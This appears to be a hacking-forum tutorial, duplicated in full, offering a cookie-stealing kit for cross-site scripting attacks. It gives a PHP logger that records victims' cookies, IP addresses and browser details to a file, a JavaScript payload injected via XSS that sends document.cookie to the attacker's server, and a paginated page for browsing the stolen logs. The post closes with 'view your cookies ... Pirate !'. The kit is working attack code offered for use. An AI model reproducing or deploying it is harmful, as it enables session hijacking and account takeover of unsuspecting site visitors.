1 ) Logger
( logger.php )
Code:
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$date = date ("j F Y h:i:s A");
$ip = $_SERVER['REMOTE_ADDR'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$referer = $_SERVER['HTTP_REFERER'];
$file = fopen('logs.html', 'a');
fwrite($file, "<tr><td>\n <font color='#990000' ><b>\n Cookies : </b></font>$cookie <br>\n<font color='#990000' ><b> Date : </b></font> $date <br>\n <font color='#990000' ><b> IP : </b></font> $ip <br>\n<font color='#990000' ><b>\n Referer : </b></font>$referer <br>\n<font color='#990000' ><b> Agent : </b></font> $agent <br>\n<hr><hr><br>\n</td></tr>\n");
fclose($file);
?>
2 ) JS logger
( logger.js )
This to insert it in your XSS directly through
Code:
<script src=http://www.yourwebsite.com/logger.js>
Code:
location.href = 'http://youwebsite.com/logger.php?cookie='+encodeURIComponent(document.co okie);
3 ) Cookie Logs page[*]Make a blank logs.html page[*] ( logs.php )
Code:
<!-- If you wanna highlight a specific words -->
<script type="text/javascript" src="highlight.js"></script>
<body onload="highlightSearchTerms('Word1');highlightSea rchTerms('Word2');highlightSearchTerms('Word3')">
<head>
<style type="text/css">
body
{
overflow:visible;
}
.pg-normal {
color: black;
font-weight: normal;
text-decoration: none;
cursor: pointer;
}
.pg-selected {
color: black;
font-weight: bold;
text-decoration: underline;
cursor: pointer;
}
</style>
<script type="text/javascript" src="page.js"></script>
</head>
<body>
<center><div id="pageNavPosition"></div></center><br><hr>
<form action="" method="get" enctype="application/x-www-form-urlencoded">
<table id="results">
<tr>
<th></th>
<th></th>
</tr>
<?php include 'logs.html'; ?>
</table>
</form>
<script type="text/javascript"><!--
var pager = new Pager('results', 10);
pager.init();
pager.showPageNav('pager', 'pageNavPosition');
pager.showPage(1);
//--></script>
</body>
</html>[*]page.js [for pagination ]
Code:
function Pager(tableName, itemsPerPage) {
this.tableName = tableName;
this.itemsPerPage = itemsPerPage;
this.currentPage = 1;
this.pages = 0;
this.inited = false;
this.showRecords = function(from, to) {
var rows = document.getElementById(tableName).rows;
// i starts from 1 to skip table header row
for (var i = 1; i < rows.length; i++) {
if (i < from || i > to)
rows.style.display = 'none';
else
rows.style.display = '';
}
}
this.showPage = function(pageNumber) {
if (! this.inited) {
alert("not inited");
return;
}
var oldPageAnchor = document.getElementById('pg'+this.currentPage);
oldPageAnchor.className = 'pg-normal';
this.currentPage = pageNumber;
var newPageAnchor = document.getElementById('pg'+this.currentPage);
newPageAnchor.className = 'pg-selected';
var from = (pageNumber - 1) * itemsPerPage + 1;
var to = from + itemsPerPage - 1;
this.showRecords(from, to);
}
this.prev = function() {
if (this.currentPage > 1)
this.showPage(this.currentPage - 1);
}
this.next = function() {
if (this.currentPage < this.pages) {
this.showPage(this.currentPage + 1);
}
}
this.init = function() {
var rows = document.getElementById(tableName).rows;
var records = (rows.length - 1);
this.pages = Math.ceil(records / itemsPerPage);
this.inited = true;
}
this.showPageNav = function(pagerName, positionId) {
if (! this.inited) {
alert("not inited");
return;
}
var element = document.getElementById(positionId);
var pagerHtml = '<span onclick="' + pagerName + '.prev();" class="pg-normal"> « Prev </span> | ';
for (var page = 1; page <= this.pages; page++)
pagerHtml += '<span id="pg' + page + '" class="pg-normal" onclick="' + pagerName + '.showPage(' + page + ');">' + page + '</span> | ';
pagerHtml += '<span onclick="'+pagerName+'.next();" class="pg-normal"> Next »</span>';
element.innerHTML = pagerHtml;
}
}[*]highlight.js [ optional ]
This to highlight specific words as its written at the top of logs.php page
Code:
function doHighlight(bodyText, searchTerm, highlightStartTag, highlightEndTag)
{
// the highlightStartTag and highlightEndTag parameters are optional
if ((!highlightStartTag) || (!highlightEndTag)) {
highlightStartTag = "<font style='color:blue; background-color:yellow;'><b>";
highlightEndTag = "</font></b>";
}
var newText = "";
var i = -1;
var lcSearchTerm = searchTerm.toLowerCase();
var lcBodyText = bodyText.toLowerCase();
while (bodyText.length > 0) {
i = lcBodyText.indexOf(lcSearchTerm, i+1);
if (i < 0) {
newText += bodyText;
bodyText = "";
} else {
// skip anything inside an HTML tag
if (bodyText.lastIndexOf(">", i) >= bodyText.lastIndexOf("<", i)) {
// skip anything inside a <script> block
if (lcBodyText.lastIndexOf("/script>", i) >= lcBodyText.lastIndexOf("<script", i)) {
newText += bodyText.substring(0, i) + highlightStartTag + bodyText.substr(i, searchTerm.length) + highlightEndTag;
bodyText = bodyText.substr(i + searchTerm.length);
lcBodyText = bodyText.toLowerCase();
i = -1;
}
}
}
}
return newText;
}
function highlightSearchTerms(searchText, treatAsPhrase, warnOnFailure, highlightStartTag, highlightEndTag)
{
if (treatAsPhrase) {
searchArray = [searchText];
} else {
searchArray = searchText.split(" ");
}
if (!document.body || typeof(document.body.innerHTML) == "undefined") {
if (warnOnFailure) {
alert("Sorry, for some reason the text of this page is unavailable. Searching will not work.");
}
return false;
}
var bodyText = document.body.innerHTML;
for (var i = 0; i < searchArray.length; i++) {
bodyText = doHighlight(bodyText, searchArray, highlightStartTag, highlightEndTag);
}
document.body.innerHTML = bodyText;
return true;
}
/*
* This displays a dialog box that allows a user to enter their own
* search terms to highlight on the page, and then passes the search
* text or phrase to the highlightSearchTerms function. All parameters
* are optional.
*/
function searchPrompt(defaultText, treatAsPhrase, textColor, bgColor)
{
// This function prompts the user for any words that should
// be highlighted on this web page
if (!defaultText) {
defaultText = "";
}
// we can optionally use our own highlight tag values
if ((!textColor) || (!bgColor)) {
highlightStartTag = "";
highlightEndTag = "";
} else {
highlightStartTag = "<font style='color:" + textColor + "; background-color:" + bgColor + ";'>";
highlightEndTag = "</font>";
}
if (treatAsPhrase) {
promptText = "Please enter the phrase you'd like to search for:";
} else {
promptText = "Please enter the words you'd like to search for, separated by spaces:";
}
searchText = prompt(promptText, defaultText);
if (!searchText) {
alert("No search terms were entered. Exiting function.");
return false;
}
return highlightSearchTerms(searchText, treatAsPhrase, true, highlightStartTag, highlightEndTag);
}
/*
* This function takes a referer/referrer string and parses it
* to determine if it contains any search terms. If it does, the
* search terms are passed to the highlightSearchTerms function
* so they can be highlighted on the current page.
*/
function highlightGoogleSearchTerms(referrer)
{
// This function has only been very lightly tested against
// typical Google search URLs. If you wanted the Google search
// terms to be automatically highlighted on a page, you could
// call the function in the onload event of your <body> tag,
// like this:
// <body onload='highlightGoogleSearchTerms(document.referr er);'>
//var referrer = document.referrer;
if (!referrer) {
return false;
}
var queryPrefix = "q=";
var startPos = referrer.toLowerCase().indexOf(queryPrefix);
if ((startPos < 0) || (startPos + queryPrefix.length == referrer.length)) {
return false;
}
var endPos = referrer.indexOf("&", startPos);
if (endPos < 0) {
endPos = referrer.length;
}
var queryString = referrer.substring(startPos + queryPrefix.length, endPos);
// fix the space characters
queryString = queryString.replace(/%20/gi, " ");
queryString = queryString.replace(/\+/gi, " ");
// remove the quotes (if you're really creative, you could search for the
// terms within the quotes as phrases, and everything else as single terms)
queryString = queryString.replace(/%22/gi, "");
queryString = queryString.replace(/\"/gi, "");
return highlightSearchTerms(queryString, false);
}
/*
* This function is just an easy way to test the highlightGoogleSearchTerms
* function.
*/
function testHighlightGoogleSearchTerms()
{
var referrerString = "http://www.google.com/search?q=javascript highlight&start=0";
referrerString = prompt("Test the following referrer string:", referrerString);
return highlightGoogleSearchTerms(referrerString);
}
And finally you can view your cookies
And finally you can view your cookies through logs.php Pirate !
See Yaa
( logger.php )
Code:
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$date = date ("j F Y h:i:s A");
$ip = $_SERVER['REMOTE_ADDR'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$referer = $_SERVER['HTTP_REFERER'];
$file = fopen('logs.html', 'a');
fwrite($file, "<tr><td>\n <font color='#990000' ><b>\n Cookies : </b></font>$cookie <br>\n<font color='#990000' ><b> Date : </b></font> $date <br>\n <font color='#990000' ><b> IP : </b></font> $ip <br>\n<font color='#990000' ><b>\n Referer : </b></font>$referer <br>\n<font color='#990000' ><b> Agent : </b></font> $agent <br>\n<hr><hr><br>\n</td></tr>\n");
fclose($file);
?>
2 ) JS logger
( logger.js )
This to insert it in your XSS directly through
Code:
<script src=http://www.yourwebsite.com/logger.js>
Code:
location.href = 'http://youwebsite.com/logger.php?cookie='+encodeURIComponent(document.co okie);
3 ) Cookie Logs page[*]Make a blank logs.html page[*] ( logs.php )
Code:
<!-- If you wanna highlight a specific words -->
<script type="text/javascript" src="highlight.js"></script>
<body onload="highlightSearchTerms('Word1');highlightSea rchTerms('Word2');highlightSearchTerms('Word3')">
<head>
<style type="text/css">
body
{
overflow:visible;
}
.pg-normal {
color: black;
font-weight: normal;
text-decoration: none;
cursor: pointer;
}
.pg-selected {
color: black;
font-weight: bold;
text-decoration: underline;
cursor: pointer;
}
</style>
<script type="text/javascript" src="page.js"></script>
</head>
<body>
<center><div id="pageNavPosition"></div></center><br><hr>
<form action="" method="get" enctype="application/x-www-form-urlencoded">
<table id="results">
<tr>
<th></th>
<th></th>
</tr>
<?php include 'logs.html'; ?>
</table>
</form>
<script type="text/javascript"><!--
var pager = new Pager('results', 10);
pager.init();
pager.showPageNav('pager', 'pageNavPosition');
pager.showPage(1);
//--></script>
</body>
</html>[*]page.js [for pagination ]
Code:
function Pager(tableName, itemsPerPage) {
this.tableName = tableName;
this.itemsPerPage = itemsPerPage;
this.currentPage = 1;
this.pages = 0;
this.inited = false;
this.showRecords = function(from, to) {
var rows = document.getElementById(tableName).rows;
// i starts from 1 to skip table header row
for (var i = 1; i < rows.length; i++) {
if (i < from || i > to)
rows.style.display = 'none';
else
rows.style.display = '';
}
}
this.showPage = function(pageNumber) {
if (! this.inited) {
alert("not inited");
return;
}
var oldPageAnchor = document.getElementById('pg'+this.currentPage);
oldPageAnchor.className = 'pg-normal';
this.currentPage = pageNumber;
var newPageAnchor = document.getElementById('pg'+this.currentPage);
newPageAnchor.className = 'pg-selected';
var from = (pageNumber - 1) * itemsPerPage + 1;
var to = from + itemsPerPage - 1;
this.showRecords(from, to);
}
this.prev = function() {
if (this.currentPage > 1)
this.showPage(this.currentPage - 1);
}
this.next = function() {
if (this.currentPage < this.pages) {
this.showPage(this.currentPage + 1);
}
}
this.init = function() {
var rows = document.getElementById(tableName).rows;
var records = (rows.length - 1);
this.pages = Math.ceil(records / itemsPerPage);
this.inited = true;
}
this.showPageNav = function(pagerName, positionId) {
if (! this.inited) {
alert("not inited");
return;
}
var element = document.getElementById(positionId);
var pagerHtml = '<span onclick="' + pagerName + '.prev();" class="pg-normal"> « Prev </span> | ';
for (var page = 1; page <= this.pages; page++)
pagerHtml += '<span id="pg' + page + '" class="pg-normal" onclick="' + pagerName + '.showPage(' + page + ');">' + page + '</span> | ';
pagerHtml += '<span onclick="'+pagerName+'.next();" class="pg-normal"> Next »</span>';
element.innerHTML = pagerHtml;
}
}[*]highlight.js [ optional ]
This to highlight specific words as its written at the top of logs.php page
Code:
function doHighlight(bodyText, searchTerm, highlightStartTag, highlightEndTag)
{
// the highlightStartTag and highlightEndTag parameters are optional
if ((!highlightStartTag) || (!highlightEndTag)) {
highlightStartTag = "<font style='color:blue; background-color:yellow;'><b>";
highlightEndTag = "</font></b>";
}
var newText = "";
var i = -1;
var lcSearchTerm = searchTerm.toLowerCase();
var lcBodyText = bodyText.toLowerCase();
while (bodyText.length > 0) {
i = lcBodyText.indexOf(lcSearchTerm, i+1);
if (i < 0) {
newText += bodyText;
bodyText = "";
} else {
// skip anything inside an HTML tag
if (bodyText.lastIndexOf(">", i) >= bodyText.lastIndexOf("<", i)) {
// skip anything inside a <script> block
if (lcBodyText.lastIndexOf("/script>", i) >= lcBodyText.lastIndexOf("<script", i)) {
newText += bodyText.substring(0, i) + highlightStartTag + bodyText.substr(i, searchTerm.length) + highlightEndTag;
bodyText = bodyText.substr(i + searchTerm.length);
lcBodyText = bodyText.toLowerCase();
i = -1;
}
}
}
}
return newText;
}
function highlightSearchTerms(searchText, treatAsPhrase, warnOnFailure, highlightStartTag, highlightEndTag)
{
if (treatAsPhrase) {
searchArray = [searchText];
} else {
searchArray = searchText.split(" ");
}
if (!document.body || typeof(document.body.innerHTML) == "undefined") {
if (warnOnFailure) {
alert("Sorry, for some reason the text of this page is unavailable. Searching will not work.");
}
return false;
}
var bodyText = document.body.innerHTML;
for (var i = 0; i < searchArray.length; i++) {
bodyText = doHighlight(bodyText, searchArray, highlightStartTag, highlightEndTag);
}
document.body.innerHTML = bodyText;
return true;
}
/*
* This displays a dialog box that allows a user to enter their own
* search terms to highlight on the page, and then passes the search
* text or phrase to the highlightSearchTerms function. All parameters
* are optional.
*/
function searchPrompt(defaultText, treatAsPhrase, textColor, bgColor)
{
// This function prompts the user for any words that should
// be highlighted on this web page
if (!defaultText) {
defaultText = "";
}
// we can optionally use our own highlight tag values
if ((!textColor) || (!bgColor)) {
highlightStartTag = "";
highlightEndTag = "";
} else {
highlightStartTag = "<font style='color:" + textColor + "; background-color:" + bgColor + ";'>";
highlightEndTag = "</font>";
}
if (treatAsPhrase) {
promptText = "Please enter the phrase you'd like to search for:";
} else {
promptText = "Please enter the words you'd like to search for, separated by spaces:";
}
searchText = prompt(promptText, defaultText);
if (!searchText) {
alert("No search terms were entered. Exiting function.");
return false;
}
return highlightSearchTerms(searchText, treatAsPhrase, true, highlightStartTag, highlightEndTag);
}
/*
* This function takes a referer/referrer string and parses it
* to determine if it contains any search terms. If it does, the
* search terms are passed to the highlightSearchTerms function
* so they can be highlighted on the current page.
*/
function highlightGoogleSearchTerms(referrer)
{
// This function has only been very lightly tested against
// typical Google search URLs. If you wanted the Google search
// terms to be automatically highlighted on a page, you could
// call the function in the onload event of your <body> tag,
// like this:
// <body onload='highlightGoogleSearchTerms(document.referr er);'>
//var referrer = document.referrer;
if (!referrer) {
return false;
}
var queryPrefix = "q=";
var startPos = referrer.toLowerCase().indexOf(queryPrefix);
if ((startPos < 0) || (startPos + queryPrefix.length == referrer.length)) {
return false;
}
var endPos = referrer.indexOf("&", startPos);
if (endPos < 0) {
endPos = referrer.length;
}
var queryString = referrer.substring(startPos + queryPrefix.length, endPos);
// fix the space characters
queryString = queryString.replace(/%20/gi, " ");
queryString = queryString.replace(/\+/gi, " ");
// remove the quotes (if you're really creative, you could search for the
// terms within the quotes as phrases, and everything else as single terms)
queryString = queryString.replace(/%22/gi, "");
queryString = queryString.replace(/\"/gi, "");
return highlightSearchTerms(queryString, false);
}
/*
* This function is just an easy way to test the highlightGoogleSearchTerms
* function.
*/
function testHighlightGoogleSearchTerms()
{
var referrerString = "http://www.google.com/search?q=javascript highlight&start=0";
referrerString = prompt("Test the following referrer string:", referrerString);
return highlightGoogleSearchTerms(referrerString);
}
And finally you can view your cookies
And finally you can view your cookies through logs.php Pirate !
See Yaa